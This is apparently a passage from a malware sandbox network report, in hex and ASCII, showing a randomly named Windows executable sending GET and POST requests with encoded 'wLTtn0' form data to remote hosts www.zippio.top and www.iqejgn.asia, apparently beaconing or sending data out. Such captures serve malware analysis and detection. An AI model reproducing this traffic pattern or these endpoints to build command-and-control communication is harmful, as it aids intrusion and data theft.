cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
Aug 6, 2024 07:58:52.642843008 CEST	1236	IN	Data Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
Aug 6, 2024 07:58:52.642858982 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
Aug 6, 2024 07:58:52.642873049 CEST	1236	IN	Data Raw: 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7
Aug 6, 2024 07:58:52.642885923 CEST	896	IN	Data Raw: 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 30 2e 35 22 20 63 79 3d 22 38 30 37 Data Ascii: 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3
Aug 6, 2024 07:58:52.642916918 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
Aug 6, 2024 07:58:52.642930031 CEST	1236	IN	Data Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
Aug 6, 2024 07:58:52.642942905 CEST	448	IN	Data Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34 Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
Aug 6, 2024 07:58:52.643170118 CEST	1236	IN	Data Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
Aug 6, 2024 07:58:52.643358946 CEST	1236	IN	Data Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25
Aug 6, 2024 07:58:52.649327040 CEST	1236	IN	Data Raw: 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 39 22 20 63 79 3d 22 37 36 35 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 Data Ascii: fill: #ffe029"/> <circle cx="509" cy="765.9" r="3.7" transform="translate(-293.1 316.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="512" cy="748.1" r="3.7" transform="translate(-284.7 315.5) rotate(-27.1)" style="fill:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49742	203.161.46.201	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:54.614984035 CEST	534	OUT	GET /vqrt/?K4G=Thy4J4VXH8ud&wLTtn0=D/CAr8v9sBwvGeAKv008oI0MjkBGAgxM5KXsmTnzco65i9w0O1N9X/hR5jUEVoZZmkU0lOgyZlyiO279G0EZ3YYBGdvyfs1xlWPG3pHzKgtCQbUQmbM2bRnHZTpJhRrpw4VoqiQ7Sy5/ HTTP/1.1 Host: www.zippio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:58:55.193835020 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Aug 2024 05:58:55 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
Aug 6, 2024 07:58:55.193856001 CEST	1236	IN	Data Raw: 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 Data Ascii: 98.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 29
Aug 6, 2024 07:58:55.193867922 CEST	448	IN	Data Raw: 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e Data Ascii: fe029"/> <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ff
Aug 6, 2024 07:58:55.193873882 CEST	1236	IN	Data Raw: 30 33 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 35 36 2e 39 22 20 63 79 3d 22 38 30 35 2e 37 Data Ascii: 03.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="456.9" cy="805.7" r="3.7" transform="translate(-317 296.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="440.5" cy="813.7" r="3.7" transform="translate(-322.5 290.
Aug 6, 2024 07:58:55.193880081 CEST	1236	IN	Data Raw: 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 36 2e 38 22 20 63 79 3d 22 38 30 35 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 38 20 33 33 Data Ascii: 029"/> <circle cx="536.8" cy="805.3" r="3.7" transform="translate(-308 333.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="539.2" cy="787.7" r="3.7" transform="translate(-299.8 332.3) rotate(-27.1)" style="fill: #ffe029
Aug 6, 2024 07:58:55.193886042 CEST	1236	IN	Data Raw: 30 22 20 63 79 3d 22 37 38 32 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 31 2e 37 20 33 35 34 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c Data Ascii: 0" cy="782.3" r="3.7" transform="translate(-291.7 354.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="608.2" cy="784.4" r="3.7" transform="translate(-290.7 363.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="612.4
Aug 6, 2024 07:58:55.193891048 CEST	1236	IN	Data Raw: 6c 61 74 65 28 2d 32 36 30 2e 36 20 33 37 33 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 32 Data Ascii: late(-260.6 373.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="632.9" cy="740.8" r="3.7" transform="translate(-268.1 369.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="620.9" cy="729.6" r="3.7" transform="transl
Aug 6, 2024 07:58:55.193897963 CEST	328	IN	Data Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 34 2e 37 22 20 63 79 3d 22 37 37 33 2e 34 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="574.7" cy="773.4" r="3.7" transform="translate(-289.3 346.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="579.2" cy="757.5" r="3.7" transform="translate(-281.6 347.2) rotate(-27
Aug 6, 2024 07:58:55.193979979 CEST	1236	IN	Data Raw: 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 38 2e 35 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 Data Ascii: translate(-278.5 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="568" cy="730.7" r="3.7" transform="translate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="tra
Aug 6, 2024 07:58:55.194010973 CEST	1236	IN	Data Raw: 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34 32 2e 35 22 20 63 79 3d 22 36 35 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 Data Ascii: (-27.1)" style="fill: #ffe029"/> <circle cx="542.5" cy="658.8" r="3.7" transform="translate(-240.6 319.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="526.3" cy="682.4" r="3.7" transform="translate(-253.2 314.8) rotate(
Aug 6, 2024 07:58:55.198955059 CEST	1236	IN	Data Raw: 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34 34 2e 39 22 20 63 79 3d 22 37 35 33 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 38 33 2e 33 20 33 33 31 2e Data Ascii: /> <circle cx="544.9" cy="753.1" r="3.7" transform="translate(-283.3 331.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="530" cy="742.2" r="3.7" transform="translate(-280 323.1) rotate(-27.1)" style="fill: #ffe029"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49743	45.76.85.183	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:00.777484894 CEST	792	OUT	POST /9rz8/ HTTP/1.1 Host: www.iqejgn.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.iqejgn.asia Referer: http://www.iqejgn.asia/9rz8/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 34 76 6c 48 39 39 46 32 47 54 46 71 77 50 47 37 65 31 49 33 36 4d 59 51 34 59 34 78 68 70 4d 6d 38 71 72 63 58 54 71 59 66 67 66 4d 73 30 51 6a 6b 7a 56 58 34 68 69 65 51 47 65 75 4e 43 39 30 71 50 42 4d 53 6c 58 46 35 76 58 67 73 41 62 78 68 54 71 45 43 34 58 72 62 57 2b 30 6f 6e 42 67 6f 67 51 4e 30 4e 5a 75 55 46 57 45 39 61 61 4c 43 50 37 47 43 6a 61 66 42 4b 62 70 48 36 36 6a 69 68 44 6a 34 67 78 41 48 72 6c 2b 42 48 6b 34 63 46 6a 66 47 6a 33 41 30 49 4e 47 56 51 67 39 51 6e 76 44 56 4f 77 56 70 35 52 6e 7a 5a 43 6f 75 7a 44 38 74 6d 68 69 41 51 39 2f 34 74 78 36 46 6b 6a 58 62 6e 65 61 61 63 43 68 2b 68 61 67 71 41 3d 3d Data Ascii: wLTtn0=4vlH99F2GTFqwPG7e1I36MYQ4Y4xhpMm8qrcXTqYfgfMs0QjkzVX4hieQGeuNC90qPBMSlXF5vXgsAbxhTqEC4XrbW+0onBgogQN0NZuUFWE9aaLCP7GCjafBKbpH66jihDj4gxAHrl+BHk4cFjfGj3A0INGVQg9QnvDVOwVp5RnzZCouzD8tmhiAQ9/4tx6FkjXbneaacCh+hagqA==
Aug 6, 2024 07:59:01.395257950 CEST	399	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 06 Aug 2024 05:59:01 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.iqejgn.asia/9rz8/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49744	45.76.85.183	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:03.329507113 CEST	812	OUT	POST /9rz8/ HTTP/1.1 Host: www.iqejgn.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.iqejgn.asia Referer: http://www.iqejgn.asia/9rz8/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 34 76 6c 48 39 39 46 32 47 54 46 71 78 75 32 37 62 57 51 33 74 38 59 54 39 59 34 78 71 4a 4d 69 38 71 6e 63 58 57 48 56 66 53 37 4d 73 56 67 6a 6e 78 39 58 32 42 69 65 4a 32 65 76 43 69 39 4a 71 50 46 75 53 68 58 46 35 76 72 67 73 45 54 78 68 67 43 44 54 34 58 6c 51 32 2b 32 31 33 42 67 6f 67 51 4e 30 4a 31 51 55 45 2b 45 38 72 71 4c 44 71 50 42 4d 44 61 63 45 36 62 70 44 36 36 6e 69 68 43 4f 34 68 38 6c 48 74 70 2b 42 47 55 34 63 55 6a 59 50 6a 33 47 36 6f 4d 6a 46 53 70 74 64 6b 50 7a 55 39 77 6d 6f 71 5a 6d 37 50 66 4b 30 52 50 51 7a 33 5a 5a 45 53 5a 4a 76 4c 73 50 48 6c 6e 50 57 46 71 37 46 72 6e 4c 7a 7a 37 6b 38 34 30 58 46 58 38 56 62 6b 76 68 4c 4a 65 4e 43 63 2b 43 70 34 41 3d Data Ascii: wLTtn0=4vlH99F2GTFqxu27bWQ3t8YT9Y4xqJMi8qncXWHVfS7MsVgjnx9X2BieJ2evCi9JqPFuShXF5vrgsETxhgCDT4XlQ2+213BgogQN0J1QUE+E8rqLDqPBMDacE6bpD66nihCO4h8lHtp+BGU4cUjYPj3G6oMjFSptdkPzU9wmoqZm7PfK0RPQz3ZZESZJvLsPHlnPWFq7FrnLzz7k840XFX8VbkvhLJeNCc+Cp4A=
Aug 6, 2024 07:59:03.948026896 CEST	399	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 06 Aug 2024 05:59:03 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.iqejgn.asia/9rz8/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49745	45.76.85.183	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:05.879332066 CEST	1825	OUT	POST /9rz8/ HTTP/1.1 Host: www.iqejgn.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.iqejgn.asia Referer: http://www.iqejgn.asia/9rz8/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 34 76 6c 48 39 39 46 32 47 54 46 71 78 75 32 37 62 57 51 33 74 38 59 54 39 59 34 78 71 4a 4d 69 38 71 6e 63 58 57 48 56 66 53 7a 4d 73 6e 6f 6a 31 51 39 58 31 42 69 65 42 57 65 69 43 69 39 59 71 4c 70 71 53 67 72 7a 35 71 76 67 73 6d 4c 78 71 78 43 44 4b 6f 58 6c 66 57 2b 7a 6f 6e 41 6b 6f 67 41 4a 30 4e 56 51 55 45 2b 45 38 70 79 4c 56 50 37 42 4f 44 61 66 42 4b 62 66 48 36 36 50 69 68 62 37 34 68 34 62 48 64 4a 2b 42 6c 38 34 65 6d 4c 59 41 6a 33 2b 33 49 4d 42 46 53 30 33 64 6b 44 5a 55 2b 73 66 6f 70 35 6d 72 66 61 75 78 77 6a 48 74 6c 42 5a 47 51 46 34 6e 36 51 6d 4b 45 36 77 52 31 4b 48 45 34 2f 6c 7a 77 58 32 2b 4e 31 34 66 47 77 55 41 48 44 48 43 63 2b 45 62 65 4b 59 72 38 68 55 37 48 75 48 62 35 79 7a 57 73 6e 48 6c 64 69 33 72 55 33 6d 38 66 6a 35 4e 52 4d 64 45 52 4a 6d 2b 50 70 2b 71 6b 56 32 32 33 57 76 48 67 33 45 52 6e 41 37 4c 70 35 43 61 57 32 54 32 44 69 76 6e 37 52 6e 54 44 65 56 58 75 49 47 74 2f 4a 4c 6b 6a 37 70 6b 44 5a 78 65 67 62 6c 6d 62 37 41 6e 52 6d [TRUNCATED] Data Ascii: wLTtn0=4vlH99F2GTFqxu27bWQ3t8YT9Y4xqJMi8qncXWHVfSzMsnoj1Q9X1BieBWeiCi9YqLpqSgrz5qvgsmLxqxCDKoXlfW+zonAkogAJ0NVQUE+E8pyLVP7BODafBKbfH66Pihb74h4bHdJ+Bl84emLYAj3+3IMBFS03dkDZU+sfop5mrfauxwjHtlBZGQF4n6QmKE6wR1KHE4/lzwX2+N14fGwUAHDHCc+EbeKYr8hU7HuHb5yzWsnHldi3rU3m8fj5NRMdERJm+Pp+qkV223WvHg3ERnA7Lp5CaW2T2Divn7RnTDeVXuIGt/JLkj7pkDZxegblmb7AnRmxu80hHiPZDMUwwzRUAOjUTbZcWeaNLth9pyUaf4FsDH0HJNdAJcCEpll0niZqUEgVewPPIgjJaf08cHk4WxaRQ++tb7pAt3O4fP2ufrgkzNe0zrfoKSvHs9ktoIiLFQSs99uyHhBa8nPIwfB2ZrXg8a9F2WvJOJwJnxEzo6TCr6x6YyyOBVwv7jq+2EAgjLuS+A7O9JQzu+5x2F4jUmTmYLw/pqpuorElfwplbmOB2bvUnzRYPZafXGuxTtsCFNLM0w1K8fvYLoyBhHsC/ihfPcsUjWjKEfhbgZTGrQ51eBnA3sSkeogNeoVrwRpQnWGoe3hx3/9HdzR2oBoEpAC7Slq009tg//+LDs05w6fM+L2Opx/ATn7Ji/DH0Gb1lGEligNGDFQPEMfBKVwLoNXCj6TI9eZZ5QVczTLI9TuYFs7AsMhYhszVFcCkY5MmAB8DkC9Lv86uYzPT9UTqxL0NJ4OZB9NkiG/5diDiEkzCFk8/KPcZihT/GxrCIiMnuHQ/492++bjK1Tlr2W41HMqEX7WzswBwuz8zBkHeHJRxV1Z7Zp7cAJWRIX+/85hmeHt/Ep2Yr